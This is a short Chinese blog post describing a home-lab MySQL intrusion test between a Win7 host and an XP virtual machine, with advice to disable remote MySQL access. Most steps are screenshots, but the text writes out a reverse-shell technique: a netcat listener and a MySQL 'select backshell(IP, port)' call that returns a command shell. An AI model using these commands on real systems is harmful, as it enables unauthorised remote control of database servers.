在做了之前的SQL SERVER之后，便很想尝试一下MYSQL的入侵测试已经防范，与大家一起分享。 总的来说，我一直在用的是MYSQL，对MYSQL比较熟悉，相比较而言，感觉MYSQL更安全，这只是我自己胡乱猜想的，希望不要引起什么争论神马的。。。一本馒头引发的血案。。。 正题之一 物理机：Win7 虚拟机：XP 给予mysql远程权限： 给物理机远程权限： [img]http://files.jb51.net/file_images/article/201312/201312120927052.png[/img] 物理机成功连接上： [img]http://files.jb51.net/file_images/article/201312/201312120927053.png[/img] 执行侵入测试前（有图有真相）： [img]http://files.jb51.net/file_images/article/201312/201312120927054.png[/img] 执行侵入测试后（有图有真相）： [img]http://files.jb51.net/file_images/article/201312/201312120927055.png[/img] 重启前（有图有真相）： [img]http://files.jb51.net/file_images/article/201312/201312120927056.png[/img] 重启后（有图有真相）： [img]http://files.jb51.net/file_images/article/201312/201312120927057.png[/img] 正题之二： 远程登录之后写入代码，代码在yyd.txt当中，然后在MySql中写入文件： [img]http://files.jb51.net/file_images/article/201312/201312120927058.png[/img] Win7 打另外一个cmd，本地端口映射：nc -vv -l -p 端口号 虚拟机上：执行映射：select backshell("物理机IP",端口号); 这便执行了3306端口反弹CMD （没图了。。。用到了一个nc软件执行的映射） yyd.txt大概内容： 正题之三： 防范 [img]http://files.jb51.net/file_images/article/201312/201312120927059.png[/img]   感觉有点乱，主要是分享了两种方法入侵，但是防范那部分应该是XP上的MySql服务关闭，但是早XP上做了好多测试，左后XP被我弄挂掉了。。。。好丢脸，只好把Win7上的MySql服务拿出来了。 觉得主要还是远程连接的问题，“如果MySql不开启远程连接的话我们还是朋友”，开玩笑，如果MySql不开启远程连接的话入侵几率会小的很多。